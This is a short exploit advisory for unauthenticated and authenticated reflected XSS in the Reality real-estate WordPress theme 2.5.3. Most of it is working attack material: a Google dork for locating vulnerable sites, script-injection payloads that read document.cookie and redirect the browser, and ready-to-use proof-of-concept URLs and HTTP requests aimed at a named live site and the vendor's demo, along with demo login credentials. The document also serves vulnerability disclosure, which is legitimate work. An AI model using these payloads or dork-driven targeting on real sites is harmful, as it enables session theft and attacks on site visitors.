[+] Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.3 - Multiple Reflected XSS [+] Google Dork: inurl:/wp-content/themes/reality/ [+] Date: 2020-06-20 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: InwaveThemes [ http://inwavethemes.com ] [+] Software Version: 2.5.3 [+] Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated & Authenticated Reflected XSS vulnerabilities was discovered in the Reality theme through 2.5.3 for WordPress. [i] Demo account: poc_user / vector (login / password) ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS -> /?label=[payload] [x] Authenticated Reflected XSS / Content Spoofing ### [ Payloads: ] [$] 1"--><img src=x onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;> [$] "><script>alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;</script> ### [ PoC Unauthenticated Reflected XSS: ] [!] https://plazaestates.es/en/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E [!] GET /en/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1 Host: plazaestates.es ### [ PoC Authenticated Reflected XSS: ] [!] http://reality.inwavethemes.com/dashboard/?tab=%22%3E%3Cscript%3Ealert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3C/script%3E [!] GET /dashboard/?tab=%22%3E%3Cscript%3Ealert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3C/script%3E HTTP/1.1 Host: reality.inwavethemes.com Cookie: [cookies_here] ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector